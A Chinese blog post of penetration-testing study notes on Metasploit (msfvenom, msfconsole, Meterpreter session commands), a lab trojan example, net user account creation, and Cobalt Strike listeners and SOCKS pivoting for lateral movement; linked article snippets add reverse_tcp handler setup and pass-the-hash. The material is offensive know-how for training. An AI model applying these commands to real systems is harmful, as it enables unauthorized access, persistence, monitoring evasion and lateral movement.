记录一次学习过程(msf、cs的使用、横向渗透等等)

已于 2024-08-03 12:30:12 修改
阅读量841 收藏 26
点赞数 30
分类专栏: 渗透学习 文章标签: 学习 安全 cs msf
于 2024-08-03 12:29:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/140882467
版权

目录

用python搭建一个简单的web服务器

代码解释

MSF

msfvenom

功能

用途

查看payloads列表

msfconsole

功能

用途

msfvenom和msfconsole配合使用

来个例子

msf会话中用到的一些命令

在windows中net user用法

列出所有用户账户

显示单个用户账户信息

创建用户账户

修改用户账户

CS

不同监听器的作用

不同payloads作用

SOCKES Server代理工具

用python搭建一个简单的web服务器

 python3 -m http.server 9999

代码解释

-m 是 Python 解释器的一个选项,用于执行一个模块。在这里,http.server 是 Python 的一个内置模块,提供了一个简单的 HTTP 服务器,可以用于快速共享文件或者进行简单的 Web 开发和测试。 

9999这是指定的端口号,即 HTTP 服务器将会监听的端口。在这个例子中,服务器会监听在本地的 9999 端口上

 

MSF

msf分为两个部分msfvenom和msfconsole

msfvenom

功能

msfvenom 是 Metasploit 框架中的 Payload 生成工具。它可以生成各种不同类型的 Payload(载荷),包括恶意代码、shellcode、脚本等,用于在渗透测试和漏洞利用中执行各种攻击。
msfvenom 提供了广泛的选项和参数,使用户能够定制生成的 Payload,包括 Payload 的类型、编码方式、目标操作系统和架构等。

用途

主要用于生成定制的 Payload,用于利用安全漏洞、获取远程访问权限等攻击。

查看payloads列表

msfvenom --list payloads

下面仅展示一部分

msfconsole

功能

auxiliary这个模块可以用来探测,exploit可以用来漏洞利用

msfconsole 是 Metasploit 框架的交互式命令行界面。它是一个强大的工具,提供了丰富的模块和命令,用于渗透测试、漏洞利用、网络发现和安全评估等任务。
用户可以通过 msfconsole 与 Metasploit 框架进行交互,执行模块、加载插件、设置选项、运行扫描、执行漏洞利用等操作。

用途

主要用于管理和执行 Metasploit 框架中的各种模块和插件,是渗透测试中常用的操作界面。

msfvenom和msfconsole配合使用

在实际渗透测试中,通常会先使用 msfconsole 来扫描目标、选择合适的漏洞利用模块,然后使用 msfvenom 生成适当的 Payload,最后通过 msfconsole 或其他 Metasploit 模块将 Payload 传递给目标系统。

msfconsole 提供了命令和选项来直接使用 msfvenom 生成 Payload,使整个攻击过程更加流畅和高效。

来个例子

首先生成木马

攻击者生成一个简单的web服务器

然后靶机加载木马(这里模拟的就是被攻击者无意中打开木马)

使用msfconsole模块利用木马,获取权限

使用这句话run post/windows/manage/enable_rdp可以强开3389端口(远程桌面端口),不过权限要够

msf会话中用到的一些命令

sessions:
查看当前所有活动的会话列表。

sessions -i <id>:
进入指定ID的会话,例如 sessions -i 1。

sessions -l:
列出所有当前活动的会话。

background:
将当前会话置于后台,返回到MSF主控制台。

kill <id>:
终止指定ID的会话,例如 kill 1。

shell:
在Meterpreter会话中执行操作系统的命令行shell。

getuid:
获取当前Meterpreter会话的用户身份标识。

sysinfo:
显示关于目标系统的基本信息,如操作系统版本、主机名等。

ps:
列出目标系统上运行的进程列表。

execute:
在目标系统上执行指定的命令,例如 execute -f cmd.exe -i -H。

upload <local file> <remote path>:
将本地文件上传到目标系统的指定路径。

download <remote file> <local path>:
从目标系统下载文件到本地路径。

use post/multi/manage/shell_to_meterpreter:
将现有的交互式Shell会话转换为Meterpreter会话,以便更有效地进行后续攻击操作。

background:
将当前会话移至后台,返回到主控制台,继续其他操作。

migrate <PID>
migrate 命令用于将当前Meterpreter会话从一个正在运行的进程(process)迁移到另一个进程。这个功能在渗透测试和攻击操作中非常有用,特别是在攻击者需要避开安全监控或者持久化访问目标系统时。切换的时候shell容易掉

在windows中net user用法

列出所有用户账户

最简单的用法是直接输入 net user,它会列出系统中所有用户账户的基本信息,如用户名、全名、账户是否被禁用等。

显示单个用户账户信息

可以通过指定用户名来获取特定用户账户的详细信息,例如 net user User1。这将显示有关该用户的更详细的信息,如密码政策信息和最后一次修改的日期。

创建用户账户

使用 net user username password /add 可以创建一个新的本地用户账户,并设置初始密码。

修改用户账户

使用 net user username /passwordreq:yes 可以强制用户必须设置密码来修改用户帐户的密码。

CS

不同监听器的作用

TCP和SMB可以用于内网横向渗透,内网有两台机器,两台机器账号密码相同,就可以用这个直接上线,就相当于SMB是一个共享服务,机器通过SMB通道将木马共享

Foreign HTTP和Foreign HTTPS可以用于权限传递

不同payloads作用

windows stager payload:这个木马很大,这是一个全功能木马

windows stageless payload:这个木马是一个下载器,他会从cs的服务端(是cs公司建立的服务端)把木马下载下来

SOCKES Server代理工具

在内网中攻击不出王的机子,比如说现在攻击者入侵了一个公司的DMZ,公司的DMZ上有两张网卡一张对外网,一张对内网,内网不出网,这样你即便将木马发送给了内网机器内网机器也无法反弹。这种情况就可以使用这个代理,在DMZ上设置了代理后,攻击者直接登陆DMZ,DMZ是可以访问内网的,然后攻击这个就可以访问内网了

板栗妖怪
关注
  • 30
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2246
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
利用frp将cs的shell派生到msf
weixin_43939009的博客
06-27 756
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生到msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
csmsf联动概述
weixin_43873557的博客
02-08 2429
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
CS + MSF 联动
A_dmin的博客
12-23 1609
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
msfcs联动
qq_63501912的博客
02-06 952
msfcs之间的会话传递
MSFCS联动
GoDunTong's Blog
04-08 4215
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1809
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
MSF渗透之旅
prettyX的博客
12-30 481
渗透基础 1、show命令 Metasploit框架中包含数百个模块,没有人能用脑子把他们的名字全部记下来。在MSF终端中,运行show命令会把所有模块显示出来。 show exploits //会显示MSF中所有可用的渗透攻击模块 show auxiliary //会显示所有的辅助模块以及它们的用途 show options //保证MSF框架中各个模块正确运行所需的各种设置...
cs linux内网渗透,记一次利用cs进行内网渗透过程
weixin_29497981的博客
05-15 1115
一次利用cs进行内网渗透过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
【远控使用】Cobalt Strike横向渗透域控
孤桜懶契
09-11 2268
categories: 知识积累 top: FALSE copyright: true abbrlink: 1643719980 #date: '2021-8-7 12:00:00' #description:1400x780 tags: 内网渗透 提权 渗透测试 黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png 前言 Cobalt Strike.
横向渗透之哈希传递(PTH)
qq_46258964的博客
05-08 2025
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
csmsf权限传递以及mimikatz抓取win2012明文密码
huizhaohaha的博客
05-25 828
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
csmsf权限传递,以及mimikatz抓取win2012明文密码
weixin_62304542的博客
05-27 824
csmsf权限传递,以及mimikatz抓取win2012明文密码
课堂笔记——csmsf权限传递,以及mimikatz抓取win2012明文密码
最新发布
qq_64338246的博客
06-26 373
CS(Cobalt Strike)和MSF(Metasploit Framework)是两个广泛使用渗透测试工具,它们可以相互配合,实现权限传递,扩大攻击范围。Cobalt Strike采用客户端/服务端架构,允许多人进行团队协作,特别适合模拟高级持续性威胁(APT)攻击。它集成了多种功能,包括端口转发、服务扫描、自动化溢出、多模式端口监听、Windows可执行文件(exe)木马生成、动态链接库(dll)生成、Java木马生成、Office宏病毒生成、木马捆绑;钓鱼攻击等。
内网-域横向CS&MSF联动及应急响应初识
mingyqf的博客
11-24 997
内网-域横向CS&MSF联动及应急响应初识 本课重点: 案例1:MSF&CobaltStrike联动Shell 案例2:WEB攻击应急响应朔源-后门,日志 案例3:WIN系统攻击应急响应朔源-后门,日志,流量 案例1:MSF&CobaltStrike联动Shell 为什么要进行联动?因为csmsf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在csmsf、powershell之间进行会话委派。powersh
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1887
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#网络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3676
横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值